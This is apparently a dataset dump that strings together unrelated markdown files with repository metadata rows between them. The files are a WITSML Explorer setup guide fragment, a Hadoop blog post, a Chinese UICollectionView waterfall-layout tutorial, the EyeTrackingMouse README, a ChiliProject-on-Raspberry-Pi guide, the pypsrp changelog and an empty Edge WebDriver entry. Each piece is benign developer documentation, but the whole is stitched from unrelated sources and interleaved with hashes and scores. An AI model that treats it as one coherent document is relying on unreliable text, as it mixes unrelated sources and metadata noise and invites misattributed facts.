so that the backend will be able to connect to our new database: ``` "MongoDb": { "Name": "witsml-explorer-db", "ConnectionString": "mongodb://<username>:<password>@localhost" }, ``` `<username>` and `<password>` is what was configured in the docker-compose.yml file. #### Populate list of WITSML servers The list of WITSML servers a user can connect to is currently not editable by the user itself (feature is disabled until proper authorization is implemented). There exists some integration tests that can be run for this purpose, but first you need to add a file `secrets.json` in the integration test folder `WitsmlExplorer.IntegrationTests`. Include following into `secrets.json`: ``` { "MongoDb": { "Name": "witsml-explorer", "ConnectionString": "mongodb://<username>:<password>@localhost" } } ``` `<username>` and `<password>` is what was configured in the docker-compose.yml file. In the file `WitsmlExplorer.IntegrationTests/Api/Repositories/MongoDbRepositoryTests.cs` you shall use the test AddServer(). First remove `(Skip="Shuld only be run manually")` from the `[Fact]` just above the AddServer() test. Then update with details for your specific server: ``` var newServer = new Server { Name = "<insert servername>", Url = new Uri("<insert url>"), Description = "" }; ``` Then run the test from the commandline `dotnet test` or from your IDE. The server is now added to your mongoDB. Repeat this for all your servers. After adding your servers, reset file `MongoDbRepositoryTests.cs`. ## Running The database, backend and frontend must be running at the same time for WE to work properly. ### Backend ``` cd Src/WitsmlExplorer.Api/ # Download dependencies and build project dotnet build # Run the backend dotnet run ``` In folder `Src/WitsmlExplorer.Api/` run `dotnet build` and `dotnet run` ### Frontend ``` cd Src/WitsmlExplorer.Frontend/ # Download dependencies yarn # Run the frontend yarn dev ``` You should now find WitsmlExplorer running on `localhost:3000` in your browser. Ensure that frontend, backend and database are running. ## Testing ### Frontend ``` # From project root cd Src/WitsmlExplorer.Frontend yarn test ``` ### Backend #### Unit tests ``` # From the project root cd Tests/WitsmlExplorer.Api.Tests dotnet test ``` #### Integration tests The purpose of these tests has been to test workers and integrations directly against WITSML servers. They are by default skipped, and not part of the test suite that is run during the CI pipeline. You will need a secrets file for keeping the credentials for the server you wish to run the tests against: ``` # From the project root cd Tests/WitsmlExplorer.IntegrationTests # Create a JSON file for WITSML server secrets touch secrets.json ``` The file should contain these fields if running tests against a given WITSML server: ```json { "Witsml": { "Host": "<witsml server url>", "Username": "<username>", "Password": "<password>" } } ``` A db configuration is needed if running tests that uses the database: ```json { "MongoDb": { "Name": "witsml-explorer-db", "ConnectionString": "mongodb://<username>:<password>@localhost" } } ``` To run a given test, open the test file that contains it and remove the `Skip` part. E.g replace ``` c# [Fact(Skip = "Should only be run manually")] ``` with ``` c# [Fact] ``` Then run ``` dotnet test ``` ## Code style guidelines We use some tools to help us keep the code style as consistent as possible. Automated checks are ran when a PR is opened. The build will break if these rules are not enforced. ### Prettier [![code style: prettier](https://img.shields.io/badge/code_style-prettier-ff69b4.svg?style=flat-square)](https://github.com/prettier/prettier) In our frontend project we use the opinionated code formatter [Prettier](https://prettier.io/). Most of the rules applied are the default, but some changes can be found in `.prettierrc`. Most IDEs have plugins that support Prettier. This will make the result of formatting code in your IDE be consistent with running prettier manually. ### ESLint For linting our frontend code we use [ESLint](https://github.com/typescript-eslint/typescript-eslint). ### ECLint For our non frontend code, we use [ECLint](https://github.com/jedmao/eclint) for validating and fixing code that does not follow the project rules. They can be found in `.editorconfig` at the project root. ### Run checks as a pre-commit hook We use [Husky](https://github.com/typicode/husky) to run `ESLint` and `ECLint` as pre commit hooks. This will give errors when creating commits that causes checks to fail. ## Project overview Here you will get a brief overview of the system flow and project structure. ### Project structure summary This solution consists of 3 projects: * Witsml * Contains domain objects which maps to the XML structure from a Witsml server. It also contains functionality to build queries for a set of Witsml objects (well, wellbore, rig, log). * WitsmlExplorer.Api * Api used by the frontend application. Every request from the frontend will be handled here. Receive job descriptions and spawn workers for every writing operations done on a witsml server. * WitsmlExplorer.Frontend * Frontend web application which is what the user sees and interacts with. ### Simplified flow This diagram gives a quick overview over the application components and flows. <img src="./flow-chart.svg"> * When the user navigates in the web application, WITSML data is retrieved. * When the user adds/updates/deletes, a job is made and a worker is triggered asynchronously on the backend. * After a worker has finished, the result message will be pushed to the client, and a refresh is triggered if necessary. ### WITSML server credentials flow Every request run against a WITSML server is run from the backend and needs to be authenticated. Basic auth is required for a lot of servers, so that is currently the only way WE authenticate against them. Most actions done by the user in WE involves fetching or writing data to external WITSML servers. All these requests require credentials to be provided. It would be a very bad user experience if the user would have to provide credentials for every request. Therefore an encrypted version of the passwords is saved both on the frontend and backend. The webapp only stores them for a limited amount of time, and will provide them for every request involving WITSML servers. The backend has a [Data Protection](https://docs.microsoft.com/en-us/aspnet/core/security/data-protection/introduction) storage running in memory, which is used for creating the encrypted passwords as well as decrypting them (only possible for that running instance). Whenever a request is run towards a WITSML server, the backend will decrypt the password, and use it when running the request against the given WITSML server. This is how the flow is when a user has selected a server and will need to authenticate against it. After this is done, a fresh list of wells is fetched. <img src="./credentials-flow.svg"> ## Additional information ### Cosmos database Witsml Explorer requires a database to store application data. One option is to use a Cosmos database in Azure. #### Setting up a database in Azure 1) If not already installed, install Azure CLI on your computer [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/?view=azure-cli-latest), and then login `az login` 2) Copy `config-example.cfg` into a new file `config.cfg` in folder `Scripts/Azure` and fill in `subscriptionId` and `resourceGroupName` from your Azure subscription and resourcegroup. 3) There exist some scripts that may simplify setting up the necessary infrastructure for this project in folder `Scripts/Azure`. <br>Script to create Cosmos DB: ```./create-cosmos-db.sh``` <br>Script to run all together: ```./run-azure-scripts.sh``` 4) In file `config.cfg` enter `databaseAccountName` and a name (container) for your database in `databaseName`. 5) Run ```./create-cosmos-db.sh``` (prerequsite azure cli installed, and that your are logged in) #### Configure backend to use CosmosDB If you have a CosmosDB setup and ready, follow these steps to configure the backend properly. ``` #From project root. cd Src/WitsmlExplorer.Api # If you do not have a mysettings.json file, create it: cp appsettings.json mysettings.json ``` Add the following `"CosmosDb"` configuration to `mysettings.json` ``` { {...}, "CosmosDb": { "Uri": "<...>", (Uri from relevant Azure Database => Overview => Uri ) "Name": "<...>", (Container name from relevant Azure Database => DataExplorer || databaseName from config.cfg) "AuthKey": "<...>" (PrimaryKey from relevant Azure Database => Setting => Keys ) }, {...} } ``` ### Generating service references _Note that this only documents how it was done. It is not necessary to repeat this until incorporating changes to wsdl_. Install `dotnet-svcutil`: `dotnet tool install --global dotnet-svcutil` `ServiceReference` is generated by executing (in project folder): `dotnet-svcutil ../../Resources/Wsdl/witsml_v1.4.0_api.wsdl --namespace "*,Witsml.ServiceReference" --outputFile WitsmlService`
46.81203
300
0.755461
eng_Latn
0.996562
485a2cd1e3a6059afa0f905593e1c1b927bddc5d
5,790
md
Markdown
_posts/2017-05-12-why-choose-hadoop.md
boy007uk/OnDataEngineeringContent
bb88f85199fb4c1dbe84d4d2d8a0c5503c0c6f11
[ "Apache-2.0" ]
6
2017-02-25T19:38:56.000Z
2021-06-08T16:21:51.000Z
_posts/2017-05-12-why-choose-hadoop.md
boy007uk/OnDataEngineeringContent
bb88f85199fb4c1dbe84d4d2d8a0c5503c0c6f11
[ "Apache-2.0" ]
17
2017-02-21T21:27:16.000Z
2019-05-24T16:27:41.000Z
_posts/2017-05-12-why-choose-hadoop.md
boy007uk/OnDataEngineeringContent
bb88f85199fb4c1dbe84d4d2d8a0c5503c0c6f11
[ "Apache-2.0" ]
8
2017-02-12T02:22:53.000Z
2020-01-07T11:54:20.000Z
--- title: Why Choose Hadoop? categories: [Tech Categories] tags: [Hadoop, Hadoop Distributions, Ecosystem] date: 2017-05-12 07:30 --- So our Hadoop Distros week is going to be a bit longer than a week, but hey, we're all flexible and adaptable right? Today I'd like to spout some thoughts about why you might consider Hadoop, and I'd like to start but looking at it's history. <!--more--> Hadoop was originally designed for the single specific use case of doing aggregations over enormous volumes of data, and the combination of HDFS and MapReduce delivered this capability in a way that (at least at the very large scale) was not possible before and hasn't really been superseded since. Pig and Hive were introduced as nicer ways to write MapReduce code, but didn't fundamentally change anything. Hadoop, being open sourced, was then picked up a number of companies (both vendors and users) and taken in a couple of (largely complementary) directions. First, HDFS was positioned as a great place to put all your data so that you could run a range of analytics over the top - the mythical Data Lake (although we'll definitely talk about the challenges of building a Data Lake with Hadoop at some point). This required new technologies to bring data in (Flume and Sqoop for example), new technologies to exploit this data (Spark and Mahout for example), and a way to make all these technologies play nicely together (YARN). However there's only so far that data in a filesystem will get you in terms of analytics - if you're looking to do anything outside of batch appends and scanning workloads you're going to struggle. And so other technologies were introduced that used HDFS as an underlying storage technology to enable new data storage capabilities - HBase as a NoSQL database and Solr for search indexing for example. And what that created was not a single place to put all your data, but a range of complementary technologies that support different use cases, but that can share underlying infrastructure. All of which is good. But there were always going to be challenges trying to move Hadoop from where it started to a more general purpose capability - you're always going to be pushing against it's original architectural and design decisions. HDFS is not a general purpose cluster filesystem - it was designed for a specific use case (for example it can only do file appends rather than random updates and has a hard limit on the number of files it can hold based on the memory capacity of the Name Node for), which can cause limitations when trying to use it for more general purpose analytics or to underpin other technologies (Kudu has chosen not run over HDFS for example). And YARN was a relatively late addition to Hadoop, meaning many Hadoop technologies don't support it (including Flume, Solr and HBase, although Hortonworks is trying to address this through Slider). Which means we're now in a position whereby you potentially have multiple technologies competing rather than co-existing on our Hadoop cluster, which feels like it's starting to dilute some of the potential value. If you're interested in which technologies do or don't run over HDFS / YARN, I've tried to summarise it in diagrammatic form [here](/tech-categories/hadoop-distributions/ecosystem/). So what are your options around Hadoop? Firstly, as an ecosystem it contains a good set of technologies. HDFS plus Hive/Spark/etc. is a great platform for doing batch scanning analytical workloads. HBase and Solr are great technologies that stand up well to their competition, and Hive and Impala are starting to provide some serious competition for the established MPP database vendors. Deploying any one of these technologies to fulfil a role in your wider analytical ecosystem will do you well, but if you're going to use a commercial service you'll need to find a cost effective way of doing this - you don't want to be buying the entire ecosystem if you're not going to use it all. This is where Cloudera are going - starting to offer tailor packages that include sub-sets of the components focusing on specific use cases, and most of the Cloud or Hadoop as a Service offerings allow you to only pay for what you use. Or you can deploy Hadoop as a common analytical platform - a single set of infrastructure and a single purchase to give you a single platform that can deliver you a range of capabilities and fulfil a range of roles in a cost effective way. Note that this generally only works if you're deploying on site rather than using the Cloud however. This is where Hortonworks and MapR are focusing - Hortonworks is investing in technologies such as Slider to allow everything to integrate with YARN, and MapR have built their entire offering around their own shared multi-tenancy storage capability (MapR-FS) that is designed and built for exactly this use case (and fulfils it better than HDFS). In summary, Hadoop like any technology has it's strengths and weaknesses. It's not the be all and end all, it's certainly not going to solve all your problems and magically make you a data driven organisation, it's not going to dramatically decrease your costs, and deploying it is going to be as much hard work than deploying any other technology. However I'm hoping that the material I've added to this site over the last few months will help you start to understand what Hadoop is and how it might mean one or more of your use cases, whether that's helping you start an evaluation of how one of it's technologies stacks up against it's competition, or to understand the ecosystem and how a specific distribution or offering can meet your range of use cases. So that's some thoughts on why Hadoop - on Monday we'll summarise the options for how you can get it...
222.692308
1,254
0.796891
eng_Latn
0.999928
485a793d6294e4ebc9e6cb0b47a263c5b920985e
4,723
markdown
Markdown
_posts/2016-05-01-ios-collectionview.markdown
tanhuiya/tanhuiya.github.io
25b66c5b4073fd7216dde63aa6c1204eab6f6d16
[ "CC-BY-4.0" ]
null
null
null
_posts/2016-05-01-ios-collectionview.markdown
tanhuiya/tanhuiya.github.io
25b66c5b4073fd7216dde63aa6c1204eab6f6d16
[ "CC-BY-4.0" ]
null
null
null
_posts/2016-05-01-ios-collectionview.markdown
tanhuiya/tanhuiya.github.io
25b66c5b4073fd7216dde63aa6c1204eab6f6d16
[ "CC-BY-4.0" ]
null
null
null
--- layout: post title: UICollectionView 瀑布流 date: 2016-05-01 15:59:28.000000000 +09:00 --- ### UICollectionView 瀑布流的实现 UICollectionView 比 tableView 灵活,功能也强大很多。系统实现了流式布局,但用处还有很多限制。 要想实现更灵活的布局,就咬重写UICollectionViewLayout。 Demo地址:[WaterfallCollectionLayout](https://github.com/tanhuiya/WaterfallCollectionLayout) 先看下实现效果: ![image.png](http://upload-images.jianshu.io/upload_images/1453111-b039384c9c7dc8cb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240) 废话不多说,直接上代码: 先看WaterfallCollectionLayout.m ``` #import "WaterfallCollectionLayout.h" #define colMargin 5 #define colCount 4 #define rolMargin 5 @interface WaterfallCollectionLayout () //数组存放每列的总高度 @property(nonatomic,strong)NSMutableArray* colsHeight; //单元格宽度 @property(nonatomic,assign)CGFloat colWidth; @end 该类要重写以下方法: //完成布局前的初始工作 -(void)prepareLayout; //collectionView的内容尺寸 -(CGSize)collectionViewContentSize; //为每个item设置属性 -(UICollectionViewLayoutAttributes *)layoutAttributesForItemAtIndexPath:(NSIndexPath *)indexPath; //获取制定范围的所有item的属性 -(NSArray<UICollectionViewLayoutAttributes *> *)layoutAttributesForElementsInRect:(CGRect)rect; -(BOOL)shouldInvalidateLayoutForBoundsChange:(CGRect)newBounds; 每次调用会清空colsHeight数组里的信息: //完成布局前的初始工作 -(void)prepareLayout{ [super prepareLayout]; self.colWidth =( self.collectionView.frame.size.width - (colCount+1)*colMargin )/colCount; //让它重新加载 self.colsHeight = nil; } //通过遍历colHeight数组里的所有列来获得最长的那一列,返回contentsize //collectionView的内容尺寸 -(CGSize)collectionViewContentSize{ NSNumber * longest = self.colsHeight[0]; for (NSInteger i =0;i<self.colsHeight.count;i++) { NSNumber* rolHeight = self.colsHeight[i]; if(longest.floatValue<rolHeight.floatValue){ longest = rolHeight; } } return CGSizeMake(self.collectionView.frame.size.width, longest.floatValue); } ``` 每个cell要出来时这个方法会被调用,在此方法中设置该cell的frame。 注意heightBlock是外部控制器传进来的block用以计算每个cell的高度,现在我只是设置了随机数。如果没有传block进来我这里直接让他崩溃了。 > 为每个item设置属性 ``` -(UICollectionViewLayoutAttributes *)layoutAttributesForItemAtIndexPath:(NSIndexPath *)indexPath{ UICollectionViewLayoutAttributes* attr = [UICollectionViewLayoutAttributes layoutAttributesForCellWithIndexPath:indexPath]; NSNumber * shortest = self.colsHeight[0]; NSInteger shortCol = 0; for (NSInteger i =0;i<self.colsHeight.count;i++) { NSNumber* rolHeight = self.colsHeight[i]; if(shortest.floatValue>rolHeight.floatValue){ shortest = rolHeight; shortCol=i; } } CGFloat x = (shortCol+1)*colMargin+ shortCol * self.colWidth; CGFloat y = shortest.floatValue+colMargin; //获取cell高度 CGFloat height=0; NSAssert(self.heightBlock!=nil, @"未实现计算高度的block "); if(self.heightBlock){ height = self.heightBlock(indexPath); } attr.frame= CGRectMake(x, y, self.colWidth, height); self.colsHeight[shortCol]=@(shortest.floatValue+colMargin+height); return attr; } ``` > 获取所有item的属性 ``` -(NSArray<UICollectionViewLayoutAttributes *> *)layoutAttributesForElementsInRect:(CGRect)rect{ NSMutableArray* array = [NSMutableArray array]; NSInteger items = [self.collectionView numberOfItemsInSection:0]; for (int i = 0; i<items;i++) { UICollectionViewLayoutAttributes* attr = [self layoutAttributesForItemAtIndexPath:[NSIndexPath indexPathForItem:i inSection:0]]; [array addObject:attr]; } return array; } ``` > 实现下列方法会在出现新的cell时重新布局并调用preparelayout方法 ``` -(BOOL)shouldInvalidateLayoutForBoundsChange:(CGRect)newBounds{ return YES; } ``` > 每列高度的存放,初始高度可以改,我这里是0 ``` -(NSMutableArray *)colsHeight{ if(!_colsHeight){ NSMutableArray * array = [NSMutableArray array]; for(int i =0;i<colCount;i++){ //这里可以设置初始高度 [array addObject:@(0)]; } _colsHeight = [array mutableCopy]; } return _colsHeight; } ``` 再来看看控制器里就是这么简单 #pragma mark getter-setter -(UICollectionView *)collectionView{ if(!_collectionView){ _collectionView = [[UICollectionView alloc]initWithFrame:self.view.frame collectionViewLayout:self.layout]; _collectionView.backgroundColor = [UIColor whiteColor]; _collectionView.delegate=self; _collectionView.dataSource=self; [_collectionView registerClass:[CollectionViewCell class] forCellWithReuseIdentifier:identifer]; } return _collectionView; } -(UICollectionViewLayout *)layout{ if(!_layout){ _layout = [[WaterfallCollectionLayout alloc]initWithItemsHeightBlock:^CGFloat(NSIndexPath *index) { return [self.heightArr[index.item] floatValue]; }]; } return _layout; } -(NSArray *)heightArr{ if(!_heightArr){ //随机生成高度 NSMutableArray *arr = [NSMutableArray array]; for (int i = 0; i<100; i++) { [arr addObject:@(arc4random()%50+80)]; } _heightArr = [arr copy]; } return _heightArr; }
27.300578
139
0.752911
yue_Hant
0.523482
485b0325a067a97d301331ba23ef64398adc5d0e
1,255
md
Markdown
README.md
Romex91/EyeTrackingMouse
cab5807e48ec66212b6fb431b928b858da0d99c8
[ "MIT" ]
12
2019-11-11T20:58:58.000Z
2021-02-16T19:18:48.000Z
README.md
Romex91/EyeTrackingMouse
cab5807e48ec66212b6fb431b928b858da0d99c8
[ "MIT" ]
62
2019-10-10T13:54:03.000Z
2021-02-08T08:15:48.000Z
README.md
Romex91/EyeTrackingMouse
cab5807e48ec66212b6fb431b928b858da0d99c8
[ "MIT" ]
3
2020-02-07T15:40:04.000Z
2021-01-18T15:15:39.000Z
## EyeTrackingMouse A power-tool for clicking stuff while typing. Replaces computer mouse with combination of [Tobii Eye Tracker 4C/5](https://gaming.tobii.com/) and hotkeys. The app is 100% offline. ### Installation Download and run Setup.exe here https://github.com/Romex91/EyeTrackingMouse/releases/latest This will create an entry in [Apps & features] and schedule the app to run at Windows startup. ### Usage 5-minute User Guide: [![User Guide](https://github.com/Romex91/EyeTrackingMouse/blob/master/user_guide_preview.png)](https://youtu.be/aKi3Qr7T764) To start controlling cursor press **Win**. Double-press **Win** to toggle **Always On** mode. The keys below work only when **Win** is pressed: ``` W/A/S/D - adjust cursor position. J - Left button K - Right button H - Scroll up N - Scroll down < - Scroll left > - scroll right ``` To open Windows Start Menu press and release Win quickly. ![Default Key Bindings](https://github.com/Romex91/EyeTrackingMouse/blob/master/default_key_bindings.png) You can reassign key bindings in the settings window (click Tray icon) ### Frequently Asked Questions https://github.com/Romex91/EyeTrackingMouse/blob/master/FAQ.md ### Support the project https://www.patreon.com/EyeTrackingMouse
26.702128
125
0.755378
eng_Latn
0.422809
485b44d14ce5cb956c8d680e4675ed842cc101dd
5,146
md
Markdown
_posts/2013-02-02-chiliproject-nginx-and-passenger-on.md
iPenguin/ipenguin.github.com
3179874337b0f61ee5892a754e0c0f7c43c87020
[ "MIT" ]
null
null
null
_posts/2013-02-02-chiliproject-nginx-and-passenger-on.md
iPenguin/ipenguin.github.com
3179874337b0f61ee5892a754e0c0f7c43c87020
[ "MIT" ]
null
null
null
_posts/2013-02-02-chiliproject-nginx-and-passenger-on.md
iPenguin/ipenguin.github.com
3179874337b0f61ee5892a754e0c0f7c43c87020
[ "MIT" ]
null
null
null
--- title: "ChiliProject, Nginx and Passenger on a Raspberry Pi" permalink: "/2013/02/chiliproject-nginx-and-passenger-on.html" uuid: "8010456291845471441" guid: "tag:blogger.com,1999:blog-3270817893928434685.post-8010456291845471441" date: "2013-02-02 03:44:00" updated: "2013-02-10 08:15:31" excerpt: "Deploy bug tracking software on a Raspberry Pi" blogger: siteid: "3270817893928434685" postid: "8010456291845471441" comments: "0" header: teaser: '/assets/images/raspberry-pi-sm.jpg' categories: [Raspberry Pi, ChiliProject, Passenger, Nginx] comments: true --- ### Background Yes, I bought a [Raspberry Pi](http://downloads.element14.com/raspberryPi1.html). :-) I have some additional things I like to try out on it, but first I wanted to set it up as a low power NAS and web server. One of the projects I wanted to put on the server was the Chiliproject which I use for some person projects, but I ran into some issues that I'm going to outline in this post so that you can get the ChiliProject up and running on your Raspberry Pi. The biggest drawback for nginx is that it doesn't have a plug-in architecture like Apache, you have to compile in any additional modules you want to use. Unfortunately the deb packages on Raspian don't come with support for Passenger built-in. As a side note I did try to use thin to serve the ChiliProjcet, but let's just say I didn't have any luck with that. ### Some notes before your start I used [Raspbian Server Edition](http://sirlagz.net/tag/raspbian-server-edition/) for this setup. When I tried the same process on a [Raspbmc](http://www.raspbmc.com/) card I had lying around it wouldn't compile nginx. I chose to break out the apt-get install lines so you could see what lines were requiring the additional packages you need to install. If you don't care feel free to combine them into one line and come back when it's done, as some of the later steps will pull in quite a few extra packages. The Pi isn't the fastest device so you'll probably want to set aside an evening to get this up and running. Also the very first time you try to connect to the setup it's pretty slow to respond, but subsequent, connections and page loads go at a reasonably usable speed. ### Installing what you need If you have nginx and passenger installed already go ahead and remove them. {% highlight bash %} sudo apt-get remove nginx ruby-passenger {% endhighlight %} I'm using a copy of the original /etc/init.d/nginx to launch nginx at startup. I had to edit the script to point to the /opt/nginx/sbin/nginx binary. {% highlight bash %} sudo apt-get install rubygems sudo gem install passenger sudo apt-get install libcurl4-openssl-dev libssl-dev sudo passenger-install-nginx-module {% endhighlight %} Option 1 works nicely, but if you want IPv6 you'll have to select option 2, download nginx source, follow the instructions, and add the flag --with-ipv6 when prompted for additional flags. Note: At one point the passenger-install-nginx-module script told me I was missing the ruby1.8-dev package when in reality I was missing the ruby1.9.x-dev files, hopefully this will save someone several hours of tinkering. The the bare minimum nginx configuration you need to add to the http section: {% highlight bash %} passenger_root /var/lib/gems/1.8/gems/passenger-3.0.19; passenger_ruby /usr/bin/ruby1.8; passenger_pool_idle_time 604800; # 1 week in seconds server { listen 80; server_name chiliproject.lan; root /srv/www/public; passenger_enabled on; #keep one process running at all times so you don't have #to reload the ChiliProject every time you connect. passenger_min_instances 1; } {% endhighlight %} You can add this fragment directly into the /opt/nginx/conf/nginx.conf file, inside the http section, or you can add an include statement, and put the server {} section in another file. NOTE: /srv/www/ is the toplevel folder for the chiliproject files. {% highlight bash %} sudo apt-get install libmysqlclient-dev libpq-dev libmagickcore-dev libmagickwand-dev libsqlite3-dev {% endhighlight %} This will install a number of extra packages. {% highlight bash %} cd /srv/www/ {% endhighlight %} I'm assuming you've already [downloaded ChiliProject](https://www.chiliproject.org/projects/chiliproject/wiki/Download) and extracted it to it's final location, in this case I'm using /srv/www/ {% highlight bash %} sudo apt-get install bundler sudo bundle install [--without test development] {% endhighlight %} ### Finishing up The basics are now installed and setup. You can use [the official guide](https://www.chiliproject.org/projects/chiliproject/wiki/Installation) to do the rest of the installation starting at step 3. Everything else went smoothly for a clean install, and for an upgrade from an old Redmine install. I hope this helps you get your own setup running! EDITED: Added additional configuration information for Passenger to keep the application running to speed up subsequent connections. Thanks to [Felix Schäfer](https://www.chiliproject.org/boards/1/topics/2371?r=2373#message-2373) for the suggestion.
43.610169
223
0.767975
eng_Latn
0.990872
485ba4ec5d6038cc00369ec2fb7e030e7202a2c5
5,861
md
Markdown
CHANGELOG.md
00mjk/pypsrp
540bad3ad2a9c2c12408ccf787db67ba76377566
[ "MIT" ]
1
2022-03-11T20:07:11.000Z
2022-03-11T20:07:11.000Z
CHANGELOG.md
00mjk/pypsrp
540bad3ad2a9c2c12408ccf787db67ba76377566
[ "MIT" ]
null
null
null
CHANGELOG.md
00mjk/pypsrp
540bad3ad2a9c2c12408ccf787db67ba76377566
[ "MIT" ]
1
2022-03-11T20:07:12.000Z
2022-03-11T20:07:12.000Z
# Changelog ## 0.8.1 - 2022-02-22 * Bump `requests-credssp` minimumt to new version to support newer encryption format and simpler dependencies ## 0.8.0 - 2022-02-01 * The `CommandParameter` class now uses named keyword arguments * The `cmd` parameter for `Command` class is now a positional argument * Ensure each `ps.streams.error` entry contains a `MESSAGE_TYPE` value just like the other stream objects * Use a default of `None` if a complex custom object has no `ToString` property defined. * Moved back to using `setuptools` instead of `poetry` as the build system * Added type annotations to most public classes and methods ## 0.7.0 - 2021-12-13 ### Features * Add `pypsrp.serializer.TaggedValue` which allows the marking of a value with a tag that controls which serialization routine to apply. * This only applys to primitive objects, like `U32` as `System.UInt32`, `SS` as `System.Security.SecureString`, etc * For a full list of primitive tags see https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-psrp/c8c85974-ffd7-4455-84a8-e49016c20683 ## 0.6.1 - 2021-11-19 * Fix `no_proxy` to actually ignore environment proxy settings ## 0.6.0 - 2021-10-21 ### Breaking changes * Dropped support for Python 2.7 and Python 3.5 * Added support for Python 3.10 * Use `poetry` as the packaging and dependency management tool * Added [pykrb5](https://github.com/jborean93/pykrb5) as extra dependency for Kerberos auth on non-Windows due to a dependecy change on `pyspnego` ### Features * Use [File.Move](https://docs.microsoft.com/en-us/dotnet/api/system.io.file.move?view=net-5.0) when calling `Client.copy()` to optimistically speed up server side operations ## 0.5.0 - 2020-08-13 ### Breaking changes * Dropped support for Python 2.6 and Python 3.4 * Using `Client.copy()` and `Client.fetch()` doesn't expand variables in the local path by default. ### Features * Support endpoints that only have `Kerberos` enabled and not just `Negotiate`. * `Client.copy()` and `Client.fetch()` methods have new `expand_variables` parameter. This can be used to expand variables both in local and remote path. * Changed authentication library for `Kerberos` and `NTLM` auth to [pyspnego](https://github.com/jborean93/pyspnego). * Added a context manager for `pypsrp.client.Client` and `pypsrp.wsman.WSMan`. This ensures any resources that the transport utilises will be closed if possible ### Bugfixes * On Linux, use Kerberos if the `auto` auth provider is specified and no username or password is set. There is still no `NTLM` fallback but `Kerberos` is ideal in this scenario. * Use SHA256 when calculating the channel bindings token hash if an unknown algorithm is encountered. * Handle warning messages that are sent to the RunspacePool instead of raising an exception. ## 0.4.0 - 2019-09-19 * Fixed an issue when escaping string in PowerShell that start with `_X`. * Base relative paths off the PowerShell location and not the process location for file copy and fetch operations. * Fixed problem when using `fetch()` on PowerShell v2 hosts. * Changed `Client.copy()` to use PSRP instead of WinRS to better support non-admin scenarios. * Added explicit `environment` settings for `Client.execute_cmd()` and `Client.execute_ps()`. * Added `configuration_name` kwargs on `Client.execute_ps()`, `Client.copy()`, and `Client.fetch()` to configure the configuration endpoint it connects to. * Fixed up message encryption with `gss-ntlmssp` on Linux ## 0.3.1 - 2019-02-26 * Fix issue where `negotiate_delegate=True` did nothing with `pywin32` on Windows * Fix instances of invalid escape sequences in strings that will break in future Python versions - https://bugs.python.org/issue27364 * Added warning if requests version is older than 2.14.0 as it does not support status retries. Pypsrp will continue but without supporting status retries. * Fix byte ordering for the PID and RPID values of each PSRP message. This should not be an existing issue on normal hosts but it will make the move to SSH easier in the future * Support using a direct IPv6 address as the server name * Manually get Kerberos ticket if the one in the cache has expired and the password is set * Added explicit documentation to state that on MacOS/Heimdal KRB5 implementations, the Kerberos ticket will persist after running ## 0.3.0 - 2018-11-14 * Added `FEATURE` dict to module to denote whether a feature has been added in installed pypsrp * Added `read_timeout` to `pypsrp.wsman.WSMan` to control the timeout when waiting for a HTTP response from the server * Added `reconnection_retries` and `reconnection_backoff` to control reconnection attempts on connection failures * Changed a few log entries from `info` to `debug` as some of those log entries were quite verbose ## 0.2.0 - 2018-09-11 * Fix issue when deserialising a circular reference in a PSRP object * Added the ability to specify the `Locale` and `DataLocale` values when creating the `WSMan` object * Update the max envelope size default if the negotiated version is greater than or equal to `2.2` (PowerShell v3+) ## 0.1.0 - 2018-07-13 Initial release of pypsrp, it contains the following features * Basic Windows Remote Shell over WinRM to execute raw cmd command or processes * Various WSMan methods that can be used to execute WSMan commands * A mostly complete implementation of the PowerShell Remoting Protocol that mimics the .NET System.Management.Automation.Runspaces interface * Support for a reference host base implementation of PSRP for interactive scripts * Support for all WinRM authentication protocols like Basic, Certificate, Negotiate, Kerberos, and CredSSP * Implementation of the Windows Negotiate auth protocol to negotiate between NTLM and Kerberos auth * Support for message encryption of HTTP with the Negotiate (NTLM/Kerberos) and CredSSP protocol
50.965217
177
0.771029
eng_Latn
0.989842
485d0f282f51ec43b2af3fab4f5e3f596d88032b
952
md
Markdown
minecraft-server/digital-ocean/README.md
vvuksan/terraform
ee837a31321b5256a6dc21099a95e8e3fed25f19
[ "Apache-2.0" ]
8
2016-04-22T22:28:20.000Z
2019-10-25T15:00:14.000Z
minecraft-server/digital-ocean/README.md
vvuksan/terraform
ee837a31321b5256a6dc21099a95e8e3fed25f19
[ "Apache-2.0" ]
null
null
null
minecraft-server/digital-ocean/README.md
vvuksan/terraform
ee837a31321b5256a6dc21099a95e8e3fed25f19
[ "Apache-2.0" ]
2
2018-12-26T15:44:03.000Z
2019-09-06T11:47:48.000Z
This terraform file creates a minecraft server on Digital Ocean. It creates a completely new Minecraft server To launch it you will need to define 3 variables * Your Digital Ocean API token (do_token) * Location of your SSH private key (pvt_key) * Location of the matching SSH public key (pub_key) There are two ways of doing it. * Rename env.sh.sample to env.sh and configure the variables in there. Then source the file with ```source env.sh``` * You can also add them directly into the variables.tf file Once you are done configuring you should type ```terraform plan``` to see the plan of execution. It should not error out. If that is looking good type ```terraform apply``` to execute it. Once it's all done you should have an instance running in the cloud. To find out what IP address it got assigned type ```terraform show | grep ipv4``` To destroy it type ```terraform destroy``` TODO: * Import minecraft config from elsewhere
25.72973
96
0.755252
eng_Latn
0.998092
485e6bd825d344349722afc9b4e12ac4aa133cf3
9,998
md
Markdown
microsoft-edge/webdriver-chromium/capabilities-edge-options.md
v-mholloway/edge-developer.es-ES
a30415a8301a3c34144e3447c0a0461ded88a256
[ "CC-BY-4.0", "MIT" ]
null
null
null
microsoft-edge/webdriver-chromium/capabilities-edge-options.md
v-mholloway/edge-developer.es-ES
a30415a8301a3c34144e3447c0a0461ded88a256
[ "CC-BY-4.0", "MIT" ]
null
null
null
microsoft-edge/webdriver-chromium/capabilities-edge-options.md
v-mholloway/edge-developer.es-ES
a30415a8301a3c34144e3447c0a0461ded88a256
[ "CC-BY-4.0", "MIT" ]
null
null
null
